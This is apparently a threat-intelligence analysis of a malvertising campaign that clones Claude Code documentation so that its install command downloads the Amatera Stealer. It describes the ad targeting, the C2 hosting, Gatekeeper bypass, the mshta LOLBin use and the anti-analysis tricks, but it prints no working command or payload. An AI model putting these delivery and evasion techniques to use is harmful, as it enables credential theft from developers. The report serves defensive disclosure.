InstallFix: Fake Claude Code Pages Deliver Amatera Stealer

A malvertising campaign is actively targeting developers and non-technical “vibe coders” searching for Claude Code installation instructions. Attackers purchase Google Ads for terms like “install Claude Code” and “Claude Code CLI,” directing victims to pixel-perfect clones of the official Claude Code documentation. The fake pages replace the legitimate installation command with an obfuscated shell one-liner that downloads and executes the Amatera Stealer infostealer.

The campaign was first documented publicly by Push Security on March 6, 2026, under the name “InstallFix.” It specifically targets macOS users with a multi-stage payload chain that bypasses Gatekeeper protections. A Windows variant using the mshta.exe LOLBin technique has also been observed. At the time of this analysis, at least one Squarespace clone domain and multiple payload delivery domains remain live.

Investigation of the C2 infrastructure revealed a Caddy-based panel hosted on VDSina (SERVERS TECH FZCO, Dubai/Netherlands) with open registration, fronted by Cloudflare. The attacker rotates panel domains every few weeks while maintaining origin servers on the same hosting provider. The binary uses an anti-analysis technique where main() is a no-op and actual execution runs from a constructor function, with all strings built character-by-character at runtime from encrypted lookup tables.

The technique exploits a fundamental trust assumption in developer tooling: the “curl-to-bash” installation pattern, where the entire security model relies on the user trusting the domain in the command. With AI coding tools attracting users who may not scrutinize terminal commands, the attack surface has expanded well beyond the traditional developer audience.

Figure 1 — Sponsored Google result directing to Squarespace clone

Figure 2 — Fake documentation page with obfuscated install command